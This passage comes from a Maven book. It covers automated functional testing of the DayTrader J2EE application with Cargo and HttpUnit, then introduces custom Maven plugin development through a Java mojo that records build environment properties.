Since Geronimo 1.0 comes with the DayTrader application bundled, you will need to make sure that the DayTrader application is not already deployed before running the exec:exec goal, or it will fail. To stop the bundled version, create a new execution of the Exec plugin or run the following:

    C:\apps\geronimo-1.0-tomcat\bin>deploy stop geronimo/daytrader-derby-tomcat/1.0/car

If you need to undeploy the DayTrader version that you've built above, you'll use the "Trade" identifier instead:

    C:\apps\geronimo-1.0-tomcat\bin>deploy undeploy Trade
4.13. Testing J2EE Applications

In this last section you'll learn how to automate functional testing of the EAR built previously. At the time of writing, Maven only supports integration and functional testing by creating a separate module. To achieve this, create a functional-tests module as shown in Figure 4-13.

Figure 4-13: The new functional-tests module amongst the other DayTrader modules

You need to add this module to the list of modules in daytrader/pom.xml so that it's built along with the others. However, functional tests can take a long time to execute, so you can define a profile to build the functional-tests module only on demand (for more information on profiles, see Chapter 7). A sketch of such a profile follows this paragraph.
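This is a minimal sketch of what that parent-POM profile could look like; the functional-test id matches the -Pfunctional-test invocation used below, and the list of always-built modules is elided:

    <modules>
      <!-- modules that are always built -->
      [...]
    </modules>
    <profiles>
      <profile>
        <id>functional-test</id>
        <modules>
          <!-- built only when the profile is activated -->
          <module>functional-tests</module>
        </modules>
      </profile>
    </profiles>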
This means that running mvn install will not build the functional-tests module, but running mvn install -Pfunctional-test will.

Now, take a look in the functional-tests module itself. Figure 4-14 shows how it is organized:

• Functional tests are put in src/it/java.
• Classpath resources required for the tests are put in src/it/resources (this particular example doesn't have any resources).
• The Geronimo deployment plan file is located in src/deployment/geronimo/plan.xml.

Figure 4-14: Directory structure for the functional-tests module

As this module does not generate an artifact, the packaging should be defined as pom. However, the compiler and Surefire plugins are not triggered during the build life cycle of projects with a pom packaging, so these need to be configured in the functional-tests/pom.xml file:
    <project>
      <modelVersion>4.0.0</modelVersion>
      <parent>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader</artifactId>
        <version>1.0-SNAPSHOT</version>
      </parent>
      <artifactId>daytrader-tests</artifactId>
      <name>DayTrader :: Functional Tests</name>
      <packaging>pom</packaging>
      <description>DayTrader Functional Tests</description>
      <dependencies>
        <dependency>
          <groupId>org.apache.geronimo.samples.daytrader</groupId>
          <artifactId>daytrader-ear</artifactId>
          <version>1.0-SNAPSHOT</version>
          <type>ear</type>
          <scope>provided</scope>
        </dependency>
        [...]
      </dependencies>
      <build>
        <testSourceDirectory>src/it</testSourceDirectory>
        <plugins>
          <plugin>
            <groupId>org.apache.maven.plugins</groupId>
            <artifactId>maven-compiler-plugin</artifactId>
            <executions>
              <execution>
                <goals>
                  <goal>testCompile</goal>
                </goals>
              </execution>
            </executions>
          </plugin>
          <plugin>
            <groupId>org.apache.maven.plugins</groupId>
            <artifactId>maven-surefire-plugin</artifactId>
            <executions>
              <execution>
                <phase>integration-test</phase>
                <goals>
                  <goal>test</goal>
                </goals>
              </execution>
            </executions>
          </plugin>
          [...]
        </plugins>
      </build>
    </project>
As you can see, there is also a dependency on the daytrader-ear module. This is because the EAR artifact is needed to execute the functional tests. It also ensures that the daytrader-ear module is built before running the functional-tests build when the full DayTrader build is executed from the top level in daytrader/. As the Surefire plugin's test goal has been bound to the integration-test phase above, you'll bind the Cargo plugin's start and deploy goals to the pre-integration-test phase and the stop goal to the post-integration-test phase, thus ensuring the proper order of execution.

You may be asking how to start the container and deploy the DayTrader EAR into it. You're going to use the Cargo plugin to start Geronimo and deploy the EAR into it.

For integration and functional tests, you will usually utilize a real database in a known state. To set up your database you can use the DBUnit Java API (see http://dbunit.sourceforge.net/). However, in the case of the DayTrader application, there's a DayTrader Web page that loads test data into the database. In addition, Derby is the default database configured in the deployment plan, and it is started automatically by Geronimo, so DBUnit is not needed to perform any database operations.

Start by adding the Cargo dependencies to the functional-tests/pom.xml file:

    <project>
      [...]
      <dependencies>
        [...]
        <dependency>
          <groupId>org.codehaus.cargo</groupId>
          <artifactId>cargo-core-uberjar</artifactId>
          <version>0.8</version>
          <scope>test</scope>
        </dependency>
        <dependency>
          <groupId>org.codehaus.cargo</groupId>
          <artifactId>cargo-ant</artifactId>
          <version>0.8</version>
          <scope>test</scope>
        </dependency>
      </dependencies>
Then create an execution element to bind the Cargo plugin's start and deploy goals:

    <build>
      <plugins>
        [...]
        <plugin>
          <groupId>org.codehaus.cargo</groupId>
          <artifactId>cargo-maven2-plugin</artifactId>
          <executions>
            <execution>
              <phase>pre-integration-test</phase>
              <goals>
                <goal>start</goal>
                <goal>deploy</goal>
              </goals>
              <configuration>
                <wait>false</wait>
                <container>
                  <containerId>geronimo1x</containerId>
                  <zipUrlInstaller>
                    <url>http://www.apache.org/dist/geronimo/1.0/geronimo-tomcat-j2ee-1.0.zip</url>
                    <installDir>${installDir}</installDir>
                  </zipUrlInstaller>
                </container>
                <deployer>
                  <deployables>
                    <deployable>
                      <groupId>org.apache.geronimo.samples.daytrader</groupId>
                      <artifactId>daytrader-ear</artifactId>
                      <type>ear</type>
                      <properties>
                        <plan>${basedir}/src/deployment/geronimo/plan.xml</plan>
                      </properties>
                      <pingURL>...</pingURL>
                    </deployable>
                  </deployables>
                </deployer>
              </configuration>
            </execution>
            [...]

The deployer element is used to configure the Cargo plugin's deploy goal. It is configured to deploy the EAR using the Geronimo plan file. In addition, a pingURL element is specified so that Cargo will ping the specified URL until it responds, thus ensuring that the EAR is ready for servicing when the tests execute.
Last, add an execution element to bind the Cargo plugin's stop goal to the post-integration-test phase:

    [...]
            <execution>
              <id>stop-container</id>
              <phase>post-integration-test</phase>
              <goals>
                <goal>stop</goal>
              </goals>
            </execution>
          </executions>
        </plugin>
      </plugins>
    </build>
    </project>

The functional test scaffolding is now ready. An alternative to using Cargo's Maven plugin is to use the Cargo Java API directly from your tests, by wrapping it in a JUnit TestSetup class to start the container in setUp() and stop it in tearDown().

The only thing left to do is to add the tests in src/it/java. You're going to use the HttpUnit testing framework (http://httpunit.sourceforge.net/) to call a Web page from the DayTrader application and check that it's working. Add the JUnit and HttpUnit dependencies, with both defined using a test scope, as you're only using them for testing:

    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>httpunit</groupId>
      <artifactId>httpunit</artifactId>
      <version>1.6.1</version>
      <scope>test</scope>
    </dependency>
Next, add a JUnit test class called src/it/java/org/apache/geronimo/samples/daytrader/FunctionalTest.java. In the class, the DayTrader URL is called to verify that the returned page has a title of "DayTrader":

    package org.apache.geronimo.samples.daytrader;

    import junit.framework.*;
    import com.meterware.httpunit.*;

    public class FunctionalTest extends TestCase
    {
        public void testDisplayMainPage() throws Exception
        {
            WebConversation wc = new WebConversation();
            WebRequest request = new GetMethodWebRequest(
                "http://localhost:8080/daytrader");
            WebResponse response = wc.getResponse(request);
            assertEquals("DayTrader", response.getTitle());
        }
    }

It's time to reap the benefits from your build. Change directory into functional-tests, type mvn install and relax:

    C:\dev\m2book\code\j2ee\daytrader\functional-tests>mvn install
    [...]
    [surefire] Running org.apache.geronimo.samples.daytrader.FunctionalTest
    [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.531 sec
    [INFO] [cargo:stop {execution: stop-container}]

4.14. Summary

You have learned from chapters 1 and 2 how to build any type of application, and this chapter has demonstrated how to build J2EE applications. In addition, you've discovered how to automate starting and stopping containers, deploying J2EE archives and implementing functional tests.

At this stage you've pretty much become an expert Maven user! The following chapters will show even more advanced topics, such as how to write Maven plugins, how to gather project health information from your builds, how to effectively set up Maven in a team, and more.
5. Developing Custom Maven Plugins

This chapter covers:

• How plugins execute in the Maven life cycle
• Tools and languages available to aid plugin developers
• Implementing a basic plugin using Java and Ant
• Working with dependencies, source directories, and resources from a plugin
• Attaching an artifact to the project

For a successful technology, reality must take precedence over public relations, for Nature cannot be fooled.
- Richard Feynman
5.1. Introduction

As described in Chapter 2, Maven is actually a platform that executes plugins within a build life cycle, in order to perform the tasks necessary to build a project. Maven's core APIs handle the "heavy lifting" associated with loading project definitions (POMs), resolving dependencies, injecting runtime parameter information, and organizing and running plugins. The actual functional tasks, or work, of the build process are executed by the set of plugins associated with the phases of a project's build life cycle. This makes Maven's plugin framework extremely important as a means of not only building a project, but also extending a project's build to incorporate new functionality.

With most projects, the plugins provided "out of the box" by Maven are enough to satisfy the needs of most build processes (see Appendix A for a list of default plugins used to build a typical project). Even if a project requires a special task to be performed, it is still likely that a plugin already exists to perform this task. Such supplemental plugins can be found at the Apache Maven project, the loosely affiliated CodeHaus Mojo project, or even at the Web sites of third-party tools offering Maven integration by way of their own plugins (for a list of some additional plugins available for use, refer to the Plugin Matrix). However, if your project requires tasks that have no corresponding plugin, it may be necessary to write a custom plugin to integrate these tasks into the build life cycle.

This chapter will focus on the task of writing custom plugins. It starts by describing fundamentals, including a review of plugin terminology and the basic mechanics of the Maven plugin framework. From there, it will discuss the various ways that a plugin can interact with the Maven build environment and explore some examples. Finally, the chapter will cover the tools available to simplify the life of the plugin developer.

5.2. A Review of Plugin Terminology

Before delving into the details of how Maven plugins function and how they are written, let's begin by reviewing the terminology used to describe a plugin and its role in the build.

A mojo is the basic unit of work in the Maven application. It executes an atomic build task that represents a single step in the build process. Correspondingly, the build process for a project is comprised of a set of mojos executing in a particular, well-defined order. This ordering is called the build life cycle, and is defined as a set of task categories, called phases. When Maven executes a build, it traverses the phases of the life cycle in order, executing all the associated mojos at each phase of the build. This association of mojos to phases is called binding and is described in detail below.

Just like Java packages, plugins provide a grouping mechanism for multiple mojos that serve similar functions within the build life cycle. When a number of mojos perform related tasks, they are packaged together into a plugin. For example, the maven-compiler-plugin incorporates two mojos: compile and testCompile. In this case, the common theme for these tasks is the function of compiling code. Packaging these mojos inside a single plugin provides a consistent access mechanism for users. Additionally, it enables these mojos to share common code more easily. Each mojo can leverage the rich infrastructure provided by Maven for loading projects, resolving project dependencies, injecting runtime parameter information, and more.
Some plugins provide supplemental functionality, such as integration with external tools and systems. Grouping related mojos into a single plugin also benefits the plugin's users, allowing shared configuration to be added to a single section of the POM.
Using the life cycle, successive phases can make assumptions about what work has taken place in the previous phases. Therefore, the ordered execution of Maven's life cycle gives coherence to the build process.

Most mojos fall into a few general categories, which correspond to the phases of the build life cycle. As a result, mojos have a natural phase binding which determines when a task should execute within the life cycle. While mojos usually specify a default phase binding, they can be bound to any phase in the life cycle, using the plugin executions section of the project's POM. Each execution can specify a separate phase binding for its declared set of mojos; indeed, a given mojo can even be bound to the life cycle multiple times during a single build. Since phase bindings provide a grouping mechanism for mojos within the life cycle, it is important to provide the appropriate phase binding for your mojos. Binding to a phase of the Maven life cycle allows a mojo to make assumptions based upon what has happened in the preceding phases; however, before a mojo can execute, it may still require that certain activities have already been completed, so be sure to check the documentation for a mojo before you re-bind it.

In some cases, a mojo may be designed to work outside the context of the build life cycle, and as such, will not have a life-cycle phase binding at all, since it doesn't fall into any natural category within a typical build process. Such mojos may be meant to check out a project from version control, create the directory structure for a new project, or aid integration with external development tools. These mojos are meant to be used by way of direct invocation. Think of these mojos as tangential to the Maven build process, since they often perform tasks for the POM maintainer.

5.3. Bootstrapping into Plugin Development

In addition to understanding Maven's plugin terminology, you will also need a good understanding of how plugins are structured and how they interact with their environment. As a plugin developer, you must understand the mechanics of life-cycle phase binding and parameter injection, in addition to determining the appropriate phase binding for your mojos. Understanding this framework will enable you to extract the Maven build-state information that each mojo requires.

5.3.1. The Plugin Framework

Maven provides a rich framework for its plugins, including a well-defined build life cycle, dependency management, and parameter resolution and injection, plus much more. Using Maven's parameter injection infrastructure, a mojo can pick and choose what elements of the build state it requires in order to execute its task. Maven also provides a well-defined procedure for building a project's sources into a distributable archive. While Maven does in fact define three different lifecycles, the discussion in this chapter is restricted to the default life cycle, which is used for the majority of build activities (the other two life cycles deal with cleaning a project's work directory and generating a project web site). A discussion of all three build life cycles can be found in Appendix A.
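To make the executions mechanism concrete, here is a minimal, hypothetical POM fragment that binds a mojo to a chosen phase; the plugin coordinates and goal name are placeholders rather than a real plugin:

    <plugin>
      <groupId>com.example.plugins</groupId>        <!-- hypothetical -->
      <artifactId>example-maven-plugin</artifactId> <!-- hypothetical -->
      <executions>
        <execution>
          <id>report-build-env</id>
          <!-- bind this execution's goals to the package phase -->
          <phase>package</phase>
          <goals>
            <goal>extract</goal>
          </goals>
        </execution>
      </executions>
    </plugin>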
Participation in the build life cycle

Most plugins consist entirely of mojos that are bound at various phases in the life cycle according to their function in the build process. As a specific example of how plugins work together through the life cycle, consider a very basic Maven build: a project with source code that should be compiled and archived into a jar file for redistribution. Maven will execute a default life cycle for the 'jar' packaging. During this build process, the compile mojo from the maven-compiler-plugin will compile the source code into binary class files in the output directory. Then, the jar mojo from the maven-jar-plugin will harvest these class files and archive them into a jar file.

If this basic Maven project also includes source code for unit tests, then two additional mojos will be triggered to handle unit testing. The testCompile mojo from the maven-compiler-plugin will compile the test sources, then the test mojo from the maven-surefire-plugin will execute those compiled tests.

Since our hypothetical project has no "non-code" resources, none of the mojos from the maven-resources-plugin will be executed. These mojos were always present in the life-cycle definition, but until now they had nothing to do and therefore, did not execute. Instead, each of the resource-related mojos will discover this lack of non-code resources and simply opt out without modifying the build in any way. This is not a feature of the framework, but a requirement of a well-designed mojo. In good mojo design, determining when not to execute is often as important as the modifications made during execution itself. Only those mojos with tasks to perform are executed during this build; in this case, at least two of the above mojos will be invoked.

Depending on the needs of a given project, many more plugins can be used to augment the default life-cycle definition, providing functions as varied as deployment into the repository system, validation of project content, generation of the project's website, and much more. Indeed, Maven's plugin framework ensures that almost anything can be integrated into the build life cycle. This level of extensibility is part of what makes Maven so powerful.
Accessing build information

In order for mojos to execute effectively, they require information about the state of the current build. This information comes in two categories:

• Project information – which is derived from the project POM, in addition to any programmatic modifications made by previous mojo executions.
• Environment information – which is more static, and consists of the user- and machine-level Maven settings, along with any system properties that were provided when Maven was launched.

To gain access to the current build state, Maven allows mojos to specify parameters whose values are extracted from the build state using expressions. At runtime, the expression associated with a parameter is resolved against the current build state, and the resulting value is injected into the mojo.

For example, a mojo that applies patches to the project source code will need to know where to find the project source and patch files. This mojo would retrieve the list of source directories from the current build information using the following expression:

    ${project.compileSourceRoots}

Then, assuming the patch directory is specified as mojo configuration inside the POM, the expression to retrieve that information might look as follows:

    ${patchDirectory}

Using the correct parameter expressions, a mojo can keep its dependency list to a bare minimum, thereby avoiding traversal of the entire build-state object graph. For more information about which mojo expressions are built into Maven, see Appendix A.

The plugin descriptor

Though you have learned about binding mojos to life-cycle phases and resolving parameter values using associated expressions, until now you have not seen exactly how a life-cycle binding occurs. That is to say, how do you associate mojo parameters with their expression counterparts, and once resolved, how do you instruct Maven to inject those values into the mojo instance? Further, how do you instruct Maven to instantiate a given mojo in the first place? The answers to these questions lie in the plugin descriptor.

The Maven plugin descriptor is a file that is embedded in the plugin jar archive, under the path /META-INF/maven/plugin.xml. The descriptor is an XML file that informs Maven about the set of mojos that are contained within the plugin. It contains information about each mojo's implementation class (or its path within the plugin jar), the life-cycle phase to which the mojo should be bound, the set of parameters the mojo declares, and the mechanism for injecting the parameter value into the mojo instance. Within this descriptor, each declared mojo parameter includes information about the various expressions used to resolve its value, whether it is required for the mojo's execution, whether it is editable, and more. For the complete plugin descriptor syntax, see Appendix A.
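To give a feel for what this file contains, here is an abbreviated, illustrative fragment of a descriptor. It reflects the general shape of the format rather than a complete, authoritative schema, and the goal, class and parameter shown are hypothetical:

    <plugin>
      <goalPrefix>example</goalPrefix>
      <mojos>
        <mojo>
          <goal>extract</goal>
          <phase>package</phase>
          <implementation>com.example.ExtractMojo</implementation>  <!-- hypothetical -->
          <parameters>
            <parameter>
              <name>patchDirectory</name>
              <type>java.io.File</type>
              <required>true</required>
              <editable>true</editable>
            </parameter>
          </parameters>
          <configuration>
            <!-- maps the parameter to the expression used to resolve it -->
            <patchDirectory implementation="java.io.File">${patchDirectory}</patchDirectory>
          </configuration>
        </mojo>
      </mojos>
    </plugin>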
The plugin descriptor is very powerful in its ability to capture the wiring information for a wide variety of mojos. To accommodate the extensive variability required from the plugin descriptor, it uses a complex syntax. However, this flexibility comes at a price: writing a plugin descriptor by hand demands that plugin developers understand low-level details about the Maven plugin framework – details that the developer will not use, except when configuring the descriptor. This is where Maven's plugin development tools come into play.

5.3.2. Plugin Development Tools

To simplify the creation of plugin descriptors, Maven provides plugin tools to parse mojo metadata from a variety of formats. This metadata is embedded directly in the mojo's source code where possible, and its format is specific to the mojo's implementation language. By abstracting many of these details away from the plugin developer, Maven's plugin-development tools remove the burden of maintaining mojo metadata by hand. Maven's development tools expose only relevant specifications in a format convenient for a given plugin's implementation language.

These plugin-development tools are divided into the following two categories:

• The plugin extractor framework – which knows how to parse the metadata formats for every language supported by Maven. In short, it consists of a framework library which is complemented by a set of provider libraries (generally, one per supported mojo language). This framework generates both plugin documentation and the coveted plugin descriptor.

• The maven-plugin-plugin – which uses the plugin extractor framework, and orchestrates the process of extracting metadata from mojo implementations, adding any other plugin-level metadata through its own configuration (which can be modified in the plugin's POM). To generate the plugin descriptor, the maven-plugin-plugin simply augments the standard jar life cycle mentioned previously as a resource-generating step (this means the standard process of turning project sources into a distributable jar archive is modified only slightly).

Of course, the format used to write a mojo's metadata is dependent upon the language in which the mojo is implemented. Using Java, it's a simple case of providing special javadoc annotations to identify the properties and parameters of the mojo. For example, the clean mojo in the maven-clean-plugin provides the following class-level javadoc annotation:

    /**
     * @goal clean
     */
    public class CleanMojo extends AbstractMojo

This annotation tells the plugin-development tools the mojo's name, so it can be referenced from life-cycle mappings, POM configurations, and direct invocations (as from the command line). The clean mojo also defines the following:

    /**
     * Be verbose in the debug log-level?
     *
     * @parameter expression="${clean.verbose}" default-value="false"
     */
    private boolean verbose;
Here, the annotation identifies this field as a mojo parameter. In this case, it specifies that this parameter can be configured from the POM using:

    <configuration>
      <verbose>false</verbose>
    </configuration>

You may notice that this configuration name isn't explicitly specified in the annotation; it's implicit when using the @parameter annotation.

This parameter annotation also specifies two attributes, default-value and expression. The first specifies that this parameter's default value should be set to false. The second specifies that this parameter can also be configured from the command line as follows:

    -Dclean.verbose=false

At first, it might seem counter-intuitive to initialize the default value of a Java field using a javadoc annotation, especially when you could just declare the field as follows:

    private boolean verbose = false;

But consider what would happen if the default value you wanted to inject contained a parameter expression. For instance, consider the following field annotation from the resources mojo in the maven-resources-plugin:

    /**
     * Directory containing the classes.
     *
     * @parameter default-value="${project.build.outputDirectory}"
     */
    private File classesDirectory;

In this case, it's impossible to initialize the Java field with the value you need, namely the java.io.File instance which references the output directory for the current project. When the mojo is instantiated, this value is resolved based on the POM and injected into this field. Since the plugin tools can also generate documentation about plugins based on these annotations, it's a good idea to consistently specify the parameter's default value in the metadata, rather than in the Java field initialization code.

Remember, these annotations are specific to mojos written in Java. If you choose to write mojos in another language, like Ant, then the mechanism for specifying mojo metadata such as parameter definitions will be different. For a complete list of javadoc annotations available for specifying mojo metadata, see Appendix A.
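As a quick illustration, a parameter declared this way can still be overridden from the plugin's configuration section in the POM, even though its default comes from an expression. This sketch assumes the parameter is editable, and the directory value is just a placeholder:

    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-resources-plugin</artifactId>
      <configuration>
        <!-- override the ${project.build.outputDirectory} default -->
        <classesDirectory>${project.build.directory}/alternate-classes</classesDirectory>
      </configuration>
    </plugin>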
Choose your mojo implementation language

Through its flexible plugin descriptor format and invocation framework, Maven can accommodate mojos written in virtually any language. Maven currently supports mojos written in Java, Ant, and Beanshell. For many mojo developers, Java is the language of choice. Since it provides easy reuse of third-party APIs from within your mojo, Java also provides good alignment of skill sets when developing mojos from scratch. Plugin parameters can be injected via either field reflection or setter methods, and simple javadoc annotations give the plugin processing plugin (the maven-plugin-plugin) the instructions required to generate a descriptor for your mojo.

However, in certain cases you may find it easier to use Ant scripts to perform build tasks: Maven can wrap an Ant build target and use it as if it were a mojo. This is especially important during migration, when translating a project build from Ant to Maven (refer to Chapter 8 for more discussion about migrating from Ant to Maven). During the early phases of such a migration, it is often simpler to wrap existing Ant build targets with Maven mojos and bind them to various phases in the life cycle. To make Ant scripts reusable, mojo mappings and parameter definitions are declared via an associated metadata file. Ant-based plugins can consist of multiple mojos mapped to a single build script, individual mojos each mapped to separate scripts, or any combination thereof.

Since Beanshell behaves in a similar way to standard Java, this technique also works well for Beanshell-based mojos. Whatever language you use, Maven lets you select pieces of the build state to inject as mojo parameters.

5.3.3. A Note on the Examples in this Chapter

When learning how to interact with the different aspects of Maven from within a mojo, it's important to keep the examples clean and relatively simple. Otherwise, you risk confusing the issue at hand – namely, the particular feature of the mojo framework currently under discussion. Therefore, the examples in this chapter will focus on a relatively simple problem space: gathering and publishing information about a particular build. Such information might include details about the system environment, the specific snapshot versions of dependencies used in the build, and so on.

Since Java is currently the easiest language for plugin development, and because many Maven-built projects are written in Java, this chapter will focus primarily on plugin development in this language. In addition, due to the migration value of Ant-based mojos when converting a build to Maven, this chapter will also provide an example of basic plugin development using Ant.

To facilitate these examples, you will need to work with an external project, called buildinfo, which is used to read and write build information metadata files. This project can be found in the source code that accompanies this book. You can install it using the following simple command:

    mvn install
5.4. Developing Your First Mojo

For the purposes of this chapter, you will look at the development effort surrounding a sample project, called Guinea Pig, which will be deployed to the Maven repository system. This development effort will have the task of maintaining information about builds that are deployed to the development repository, eventually publishing it alongside the project's artifact in the repository for future reference (refer to Chapter 7 for more details on how teams use Maven). This information should capture relevant details about the environment used to build the Guinea Pig artifacts. Capturing this information is key, since it can have a critical effect on the build process and the composition of the resulting Guinea Pig artifacts.

5.4.1. BuildInfo Example: Capturing Information with a Java Mojo

To begin, consider a case where the POM contains a profile, which will be triggered by the value of a given system property – say, if the system property os.name is set to the value Linux (for more information on profiles, refer to Chapter 3). When triggered, this profile adds a new dependency on a Linux-specific library, which allows the build to succeed in that environment. When this profile is not triggered, a default profile injects a dependency on a windows-specific library. For simplicity, this dependency is used only during testing, and has no impact on transitive dependencies for users of this project.

Here, the values of system properties used in the build are clearly very important, for the purposes of debugging. If you have a test dependency which contains a defect, and this dependency is injected by one of the aforementioned profiles, then the value of the triggering system property – and the profile it triggers – could reasonably determine whether the build succeeds or fails. Therefore, it makes sense to publish the value of this particular system property in a build information file so that others can see the aspects of the environment that affected this build. In addition to simply capturing build-time information, you will need to disseminate the build to the rest of the development team.

Prerequisite: Building the buildinfo generator project

Before writing the buildinfo plugin, you must first install the buildinfo generator library into your Maven local repository. The buildinfo plugin is a simple wrapper around this generator, providing a thin adapter layer that allows the generator to be run from a Maven build. As a side note, by separating the generator from the Maven binding code, this approach encapsulates an important best practice: you are free to write any sort of adapter or front-end code you wish, and take advantage of a single, reusable utility in many different scenarios.

To build the buildinfo generator library, perform the following steps:

cd buildinfo
mvn install
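Returning to the profile scenario described above, a profile of that kind might look something like the following sketch in the Guinea Pig POM. The activation syntax is standard Maven 2, but the dependency coordinates shown here are invented placeholders rather than the actual libraries used by the sample project:

<profiles>
  <profile>
    <id>linux</id>
    <activation>
      <property>
        <name>os.name</name>
        <value>Linux</value>
      </property>
    </activation>
    <dependencies>
      <dependency>
        <!-- placeholder coordinates for the Linux-specific test library -->
        <groupId>com.example</groupId>
        <artifactId>linux-test-support</artifactId>
        <version>1.0</version>
        <scope>test</scope>
      </dependency>
    </dependencies>
  </profile>
</profiles>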
Using the archetype plugin to generate a stub plugin project

Now that the buildinfo generator library has been installed, it's helpful to jump-start the plugin-writing process by using Maven's archetype plugin to create a simple stub project from a standard plugin-project template. To generate a stub plugin project for the buildinfo plugin, simply execute the following:

mvn archetype:create -DgroupId=com.mergere.mvnbook.plugins \
    -DartifactId=maven-buildinfo-plugin \
    -DarchetypeArtifactId=maven-archetype-mojo

When you run this command, you're likely to see a warning message saying "${project.build.directory} is not a valid reference". This is a result of the Velocity template, used to generate the plugin source code, interacting with Maven's own plugin parameter annotations. This message does not indicate a problem.

This will create a project with the standard layout under a new subdirectory called maven-buildinfo-plugin within the current working directory. Inside, you'll find a basic POM and a sample mojo.

Once you have the plugin's project structure in place, you will need to modify the POM as follows:

• Change the name element to Maven BuildInfo Plugin.
• Remove the url element, since this plugin doesn't currently have an associated web site.

You will modify the POM again later, as you know more about your mojos' dependencies. However, for the purposes of this plugin, this simple version will suffice for now.

Finally, you should remove the sample mojo, since you will be creating your own mojo from scratch. It can be found in the plugin's project directory, under the following path:

src\main\java\com\mergere\mvnbook\plugins\MyMojo.java

The mojo

You can handle this scenario using the following, fairly simple Java-based mojo:

[...]
/**
 * Write environment information for the current build to file.
 *
 * @goal extract
 * @phase package
 */
public class WriteBuildInfoMojo extends AbstractMojo
{
    /**
     * Determines which system properties are added to the file.
     * This is a comma-delimited list.
     *
     * @parameter expression="${buildinfo.systemProperties}"
     */
    private String systemProperties;

    /**
     * The location to write the buildinfo file.
     * @parameter expression="${buildinfo.outputFile}" default-value="${project.build.outputDirectory}/${project.artifactId}-${project.version}-buildinfo.xml"
     * @required
     */
    private File outputFile;

    public void execute() throws MojoExecutionException
    {
        BuildInfo buildInfo = new BuildInfo();

        if ( systemProperties != null )
        {
            String[] keys = systemProperties.split( "," );

            Properties sysprops = System.getProperties();

            for ( int i = 0; i < keys.length; i++ )
            {
                String key = keys[i].trim();
                String value = sysprops.getProperty( key, BuildInfoConstants.MISSING_INFO_PLACEHOLDER );

                buildInfo.addSystemProperty( key, value );
            }
        }

        try
        {
            BuildInfoUtils.writeXml( buildInfo, outputFile );
        }
        catch ( IOException e )
        {
            throw new MojoExecutionException( "Error writing buildinfo XML file. Reason: " + e.getMessage(), e );
        }
    }
}

While the code for this mojo is fairly straightforward, it's worthwhile to take a closer look at the javadoc annotations. In the class-level javadoc comment, there are two special annotations:

/**
 * @goal extract
 * @phase package
 */
The first annotation, @goal, tells the plugin tools to treat this class as a mojo named extract. When you invoke this mojo, you will use this name.

The second annotation tells Maven where in the build life cycle this mojo should be executed. In this case, you're collecting information from the environment with the intent of distributing it alongside the main project artifact in the repository. Therefore, it makes sense to execute this mojo in the package phase, so it will be ready to attach to the project artifact. In addition, attaching to the package phase also gives you the best chance of capturing all of the modifications made to the build state before the jar is produced.

Aside from the class-level comment, you have several field-level javadoc comments, which are used to specify the mojo's parameters. Each offers a slightly different insight into parameter specification, so they will be considered separately. First, consider the parameter for the systemProperties variable:

/**
 * @parameter expression="${buildinfo.systemProperties}"
 */

This is one of the simplest possible parameter specifications. Using the @parameter annotation by itself, with no attributes, will allow this mojo field to be configured using the plugin configuration specified in the POM. However, you may want to allow a user to specify which system properties to include in the build information file. This is where the expression attribute comes into play. Using the expression attribute, you can specify the name of this parameter when it's referenced from the command line. In this example, the expression attribute allows you to specify a list of system properties on-the-fly, as follows:

localhost $ mvn buildinfo:extract \
    -Dbuildinfo.systemProperties=java.version,user.dir

Finally, the outputFile parameter presents a slightly more complex example of parameter annotation. Take another look:

/**
 * The location to write the buildinfo file.
 *
 * @parameter expression="${buildinfo.outputFile}" default-value="${project.build.outputDirectory}/${project.artifactId}-${project.version}-buildinfo.xml"
 *
 * @required
 */

In this case, since you have more specific requirements for this parameter, the complexity is justified. First, the mojo cannot function unless it knows where to write the build information file. To ensure that this parameter has a value, the mojo uses the @required annotation. If this parameter has no value when the mojo is configured, the build will fail with an error, as execution without an output file would be pointless. In general, you want the mojo to use a certain value – calculated from the project's information – as a default value for this parameter. Here you can see why the normal Java field initialization is not used: the default output path is constructed directly inside the annotation, using several expressions to extract project information on-demand.
The plugin POM

Once the mojo has been written, you can construct an equally simple POM which will allow you to build the plugin, as follows:

<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mergere.mvnbook.plugins</groupId>
  <artifactId>maven-buildinfo-plugin</artifactId>
  <version>1.0-SNAPSHOT</version>
  <packaging>maven-plugin</packaging>
  <dependencies>
    <dependency>
      <groupId>org.apache.maven</groupId>
      <artifactId>maven-plugin-api</artifactId>
      <version>2.0</version>
    </dependency>
    <dependency>
      <groupId>com.mergere.mvnbook.shared</groupId>
      <artifactId>buildinfo</artifactId>
      <version>1.0-SNAPSHOT</version>
    </dependency>
  </dependencies>
</project>

This POM declares the project's identity and its two dependencies. Note the dependency on the buildinfo project, which provides the parsing and formatting utilities for the build information file. Also, note the packaging – specified as maven-plugin – which means that this plugin build will follow the maven-plugin life-cycle mapping. This mapping is a slightly modified version of the one used for the jar packaging, which simply adds plugin descriptor extraction and generation to the build process.
Binding to the life cycle

Now that you have a method of capturing build-time environmental information, you need to ensure that every build captures this information. The easiest way to guarantee this is to bind the extract mojo to the life cycle, so that every build triggers it. This involves modification of the standard jar life-cycle, which you can do by adding the configuration of the new plugin to the Guinea Pig POM, as follows:

<build>
  ...
  <plugins>
    <plugin>
      <groupId>com.mergere.mvnbook.plugins</groupId>
      <artifactId>maven-buildinfo-plugin</artifactId>
      <executions>
        <execution>
          <id>extract</id>
          <configuration>
            <systemProperties>os.name,java.version</systemProperties>
          </configuration>
          <goals>
            <goal>extract</goal>
          </goals>
        </execution>
      </executions>
    </plugin>
    ...
  </plugins>
  ...
</build>

The above binding will execute the extract mojo from your new maven-buildinfo-plugin during the package phase of the life cycle, and capture the os.name and java.version system properties.
The output

Now that you have a mojo and a POM, you can build the plugin and try it out! First, build the buildinfo plugin with the following commands:

> C:\book-projects\maven-buildinfo-plugin
> mvn clean install

Next, test the plugin by building Guinea Pig with the buildinfo plugin bound to its life cycle as follows:

> C:\book-projects\guinea-pig
> mvn package

When the Guinea Pig build executes, you should see output similar to the following:

[...]
[INFO] [buildinfo:extract {execution:extract}]
[...]
[INFO] -------------------------------------------------------------------
[INFO] BUILD SUCCESSFUL
[INFO] -------------------------------------------------------------------

Under the target directory, there should be a file named:

guinea-pig-1.0-SNAPSHOT-buildinfo.xml

In the file, you will find information similar to the following:

<?xml version="1.0" encoding="UTF-8"?>
